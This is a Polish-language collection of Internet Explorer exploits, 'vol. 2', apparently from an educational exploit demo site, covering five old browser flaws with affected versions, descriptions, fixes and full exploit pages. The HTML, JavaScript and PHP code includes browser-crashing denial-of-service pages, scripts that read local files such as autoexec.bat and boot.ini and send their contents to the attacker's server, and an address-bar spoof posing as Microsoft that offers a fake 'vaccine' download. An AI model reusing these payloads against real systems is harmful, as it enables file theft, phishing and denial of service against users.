ie exploits vol. 2

// START VOL. 2

DoS in Microsoft Internet Explorer (OBJECT Tag)

Źródło: [ www ]

Data publikacji: 16. kwietnia 2003r

Podatne systemy i przeglądarki
- Microsoft Internet Explorer 5.0 pod Windows 98 SE
- Microsoft Internet Explorer 6.0 pod Windows 2000 z SP3
- Microsoft Internet Explorer 6.0 pod Windows XP z SP1

Opis podatności:

Podatność ta występuje w przeglądarce Microsoft Internet Explorer, która pozwala napastnikowi na wykonanie ataku typu DoS na przeglądarkę ofiary w czasie przeglądania przez nią specjalnie przygotowanej przez napastnika strony WWW. Podatność pochodzi ze znacznika <OBJECT> w języku HTML, który umożliwia umieszczanie kontrolek ActiveX na stronach WWW.

Kod exploita:

------------ IEObjectDoS-test.htm -----------
<Html> <Head> <Title>IEObjectDoS-test</title> </head> <Body> <OBJECT DATA="IEObjectDoS-test.htm" TYPE="text/html"></OBJECT> </body> </html>

Opis działania exploita:
Cały atak wykonywany jest przy użyciu jednego pliku. Exploit opiera swoje działanie na wykorzystaniu znacznika <OBJECT>, który posiada parametr ?DATA=? wskazujący przeglądarce skąd ma pobierać dane dla uruchamianej kontrolki ActiveX. Jeżeli jednak parametr ?DATA=? będzie wskazywał źródło danych na dokument HTML zawierający taką właśnie deklarację to nastąpi rekurencyjne wczytywanie się dokumentu, co prowadzi do natychmiastowego zamknięcia przeglądarki z powodu przepełnienia stosu. Atak kończy się sukcesem, gdy przeglądarka zakończy swoje działanie z błędem podczas przeglądania strony zawierającej złośliwy kod.

Sposób rozwiązania/naprawy:
Konfiguracja stref zabezpieczeń przeglądarki: Ustaw ?Uruchamianie formantów ActiveX i dodatków plug-in?na ?Wyłącz? we wszystkich strefa zabezpieczeń.


Page Transitions Denial of Service Attack

Źródło: [ www ]

Data publikacji: 16. kwietnia 2003r

Podatne systemy i przeglądarki
- Microsoft Internet Explorer 6.0

Opis podatności:

Podatność ta występuje w przeglądarce Microsoft Internet Explorer, która pozwala napastnikowi na wykonanie ataku typu DoS na przeglądarkę ofiary w czasie przeglądania przez nią specjalnie przygotowanej przez napastnika strony WWW. Problem występuje, gdy przejście pomiędzy stronami (ang. page transition) zostało rozpoczęte, gdy tymczasem poprzednia nie została jeszcze w całości wyświetlona. Ta sytuacja może wystąpić, gdy następuje przekierowanie do strony za pomocą JavaScriptu zanim jeszcze strona zawierająca deklarację przekierowania nie została wyświetlona w całości.

Kod exploita:
------------ 1.html -----------
<HTML style="width:expression(navigate('2.html'));"  ;></HTML>
------------------------------------------------------
------------ 2.html -----------
<HTML> <HEAD> <META http-equiv="Page-Enter" content="blendTrans()">
</HEAD> </HTML>

Opis działania exploita:
Cały atak wykonywany jest przy użyciu dwóch plików 1.htmli 2.html, które w podatnej przeglądarce powodują powstanie wyjątku w pliku biblioteki mshtml.dll co skutkuje zamknięciem przeglądarki. Atak kończy się sukcesem, gdy po załadowaniu do przeglądarki tych stron wystąpi wyjątek uniemożliwiający dalszą pracę z aplikacją.

Sposób rozwiązania/naprawy:
Pobranie łatki na opisaną lukę.


Microsoft IE5 Download Behavior Vulnerability

Źródło: [ www ]

Data publikacji: 27. września 1999r

Podatne systemy i przeglądarki

Microsoft Internet Explorer 5.0 pod Windows NT 4.0
+ Microsoft Windows NT 4.0
Microsoft Internet Explorer 5.0 pod Windows 98
+ Microsoft Windows 98
Microsoft Internet Explorer 5.0 for Windows 95
+ Microsoft Windows 95

Opis podatności:

Właściwość ?download behavior? Internet Explorera 5 pozwala poprzez specjalnie przygotowaną stronę WWW napastnikowi na odczytywanie plików w systemie ofiary. Od wersji 5 Internet Explorer posiada nową właściwość zwaną zachowanie DHTML (DHTML Behaviors). DHTML Behaviors pozwalają programistom aplikacji Internetowych na kapsułkowanie metod, właściwości i zdarzeń, które potem mogą zostać zastosowane do elementów HTML i XML. Internet Explorer 5 posiada zbiór wbudowanych zachowań DHTML. Jedno z tych zachowań to #default#download. To zachowanie definiuje nową metodę w JavaScripcie zwaną startDownload, która wymaga dwóch parametrów: ścieżki do pliku, (który ma być ściągany) i nazwy funkcji po zakończonym ściąganiu pliku. Domyślnie metoda startDownload()sprawdza czy wskazany do ściągnięcia plik znajduje się w tej samej strefie jak plik, z którego
wywoływana jest metoda. Kiedy plik wywołujący metodę i plik wskazany do ściągnięcia są w tej samej strefie bezpieczeństwa, przeglądarka rozpoczyna proces ściągania pliku a następnie wykonuje zdefiniowaną funkcję. Napastnik może jednak przygotować złośliwą stronę, która pozwoli na ominięcie tych wymogów bezpieczeństwa -możliwe jest odczytywanie plików lokalnych lub plików należących do innej strefy bezpieczeństwa a następnie wykonywanie dowolnych działań określonych drugim parametrem wywołania funkcji startDownload.

Kod exploita:

------------ start_download.html -----------
<HTML XMLNS:MSIE >
<HEAD>
<MSIE:DOWNLOAD ID="od" STYLE="behavior:url(#default#download)" />
<script type="text/javascript" src="../../funkcje.js"></script>
<SCRIPT>
var okno;
function wyslij(s)
{
alert(?Oto zawartość Twojego pliku autoexec.bat:\n?+s); okno = sendForm(11, 1, s);
}
</SCRIPT>
</HEAD>
<BODY onload="od.startDownload('przekierowanie.php?autoexec&  #039;, wyslij)">
<script>
var i = setInterval("bezpieczny();", 2000);
function bezpieczny()
{
var y; if (okno == y) { sendForm(11, 0, ""); clearInterval(i);
}
} </script> </body> </html>
------------------------------------------------------


------------ przekierowanie.php -----------
<? header("Location: file://c:/autoexec.bat"); ?>

Opis działania exploita:

Cały atak wykonywany jest przy użyciu dwóch plików start_download.html i przekierowanie.php. Po wczytaniu w przeglądarce strony start_download.htmlzostaje automatycznie ( bez dodatkowych działań ze strony ofiary ) zainicjowane ściąganie pliku przekierowanie.php. Skrypt ten realizuje tylko jedną akcję przekierowania na lokalny plik systemowy ofiary (autoexec.bat). Jeżeli ściąganie tego pliku się zakończy zostaje wywołana funkcja wyslij(), która ma za zadanie odesłać zawartość pliku do serwera napastnika za pomocą połączenia się ze wskazanym skryptem CGI. Atak kończy się sukcesem, gdy po wczytaniu do przeglądarki strony start_download.html zostanie wyświetlone okienko z zawartością pliku autoexec.bat.

Sposób rozwiązania/naprawy:

Ustawienie w opcjach przeglądarki ?Aktywnych treści? na ?Wyłącz?.


Internet Explorer URL parsing vulnerability

Źródło: [ www ]

Data publikacji: 9. grudnia 2003r

Podatne systemy i przeglądarki
+ Microsoft Internet Explorer wersja 5.0
+ Windows 98 SE
+ Microsoft Internet Explorer wersja 6.0

Opis podatności:

Podatność występuje w sposobie wyświetlania adresów URL przez Microsoft Internet Explorer w pasku adresu. Ofiara łącząc się z odpowiednio spreparowanym adresem URL może otworzyć stronę, która pochodzi z innej domeny niż wskazuje na to adres umieszczony w pasku adresu przeglądarki. Przejście do strony o adresie w formie [ www ]żytkownik%01@domena/ powoduje, że zostaje otwarta strona po znaku ?@? gdy tymczasem pasek adresu pokazuje adres strony do znaku ?%01?.

Kod exploita:

------------ IESpoof.htm -----------
<html> <head>
<meta http-equiv="Content-Language" content="pl">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<link rel="StyleSheet" href="/style.css" type="text/css">
<title>I</title>
<script>
function Go()
{
var adres = unescape(?http://www.microsoft.com%01@? + location.host+ "/Exploity/IESpoof/www.Microsoft.com.php");
window.open( adres,'nowka', toolbar=yes,location=yes,directories=yes, status=yes,menubar=yes,scrollbars=yes,resizable=yes,fullscreen=n  o, channelmode=no,width=450,height=300,top=100,left=100');
}
</script>
</head> <body>
<a href="javascript:Go();" onMouseOver="window.status='http://www.microsoft.com&#  039;; return true" onMouseOut="window.status=''; return true">Kliknij tutaj!</a>
</body> </html>
------------ www.Microsoft.com.php -----------
<head> <Title>Microsoft </Title> </head> <body>
<img src="ms_masthead_ltr.gif"/> <b>Witamy na stronie Microsoftu. Przepraszamy, ale strona jest jeszcze w przebudowie. <br> Spowodowane jest to atakami wirusa W32.Beagle na nasze serwery. <br>
<a href="szczepionka.php">Stąd możesz pobrać szczepionkę</a><br> </body> </html> ?>

Opis działania exploita:

Cały atak wykonywany jest przy użyciu dwóch plików IESpoof.htmi www.Microsoft.com.php. Pierwszy plik inicjujący zawiera specjalnie przygotowany adres zgodnie z powyższym formatem: [ www ] Podatna przeglądarka przy przechodzeniu do podanego adresu powinna załadować stronę reprezentowaną przez drugi człon adresu po znaku ?@? (czyli www.Microsoft.com.php) a w pasku adresu powinien pokazać się pierwszy człon adresu powyżej przed znakiem
?%01?. Załadowana strona (www.Microsoft.com.php) to także witryna przygotowana przez atakującego, który może umieścić na niej dowolne treści. Możliwe jest przez napastnika kontynuowanie ataku na przeglądarkę odwiedzającego z wykorzystaniem dowolnych technik. Utwierdzenie ofiary w przekonaniu, że znajduje się ona na stronie odpowiadającej adresowi w pasku adresu może doprowadzić do podniesienia skuteczności ataku ?napastnik może wykonać częściową replikę strony odpowiadającej adresowi w pasku adresu, która będzie na tyle podobna do oryginału, że przekona ofiarę do ściągnięcia złośliwego kodu. Napastnik może też przy ładowaniu strony skorzystać z kolejnej podatności przeglądarki odwiedzającego i automatycznie uruchomić złośliwy kod w systemie ofiary. Wykorzystanie tej podatności nie pociąga za sobą żadnych destrukcyjnych działań wobec systemu komputerowego odwiedzającego, ale może wchodzić w skład bardziej złożonego ataku. Atak z wykorzystaniem tylko tej podatności kończy się sukcesem, gdy po połączeniu się z spreparowanym adresem wczytana zostanie strona www.Microsoft.com.php, gdy tymczasem pasek zadań będzie pokazywał adres [ www ]

Sposób rozwiązania/naprawy:

Zainstalowanie poprawki Microsoftu (832894)


Internet Explorer - MSScriptControl.ScriptControl

Źródło: [ www ]
     http://www.dataguard.dk/bugtraq/2001_1/1585.html

Data publikacji:

31. marca 2001r

Podatne systemy i przeglądarki

Internet Explorer 5.5
+ Windows 2000

Opis podatności:

Podatność ta występuje w przeglądarce Microsoft Internet Explorer. Błąd rezyduje w Internet Explorerze, który pozwala napastnikowi na odczytanie zawartości znanych plików w komputerze ofiary w czasie, gdy użytkownik przegląda specjalnie przygotowaną przez agresora stronę. Problem występuje, gdy funkcja GetObject()zostaje zastosowana do obiektu ActiveX ?MSScriptControl.ScriptControl?. Możliwe wtedy staje się uzyskanie pełnego dostępu do określanego pliku w systemie ofiary. Możliwe jest odczytanie każdego znanego pliku w systemie ofiary a następnie przesłanie zawartości na serwer napastnika.

Kod exploita:
------------ MSScript.htm -----------
<HTML> <HEAD> <title></title>
<script type="text/javascript" src="../../funkcje.js"></script>
</head> <BODY>
<script>
v=new ActiveXObject("MSScriptControl.ScriptControl.1"); v.Language="VBScript"; x=v.eval('GetObject("C:/boot.ini","htmlfile&  quot;)');
setTimeout("sendForm(10, 1, x.body.outerHTML);",2000);
</script>
</BODY> </HTML>

Opis działania exploita:

Cały atak wykonywany jest przy użyciu jednego pliku MSScript.htm. Po wczytaniu w przeglądarce strony MSScript.htm zostaje automatycznie ( bez dodatkowych działań ze strony ofiary ) zainicjowane ściąganie lokalnego pliku systemowego c:\boot.ini. Po 2s zostaje wywołana funkcja sendForm(), która ma za zadanie odesłać zawartość pliku do serwera napastnika za pomocą połączenia się ze wskazanym skryptem CGI. Atak kończy się sukcesem, gdy po wczytaniu do przeglądarki strony MSScript.htm zostanie wyświetlone okienko z zawartością lokalnego pliku systemowego c:/boot.ini.

Sposób rozwiązania/naprawy:
zainstalowanie odpowiedniej poprawki


// STOP VOL. 2

---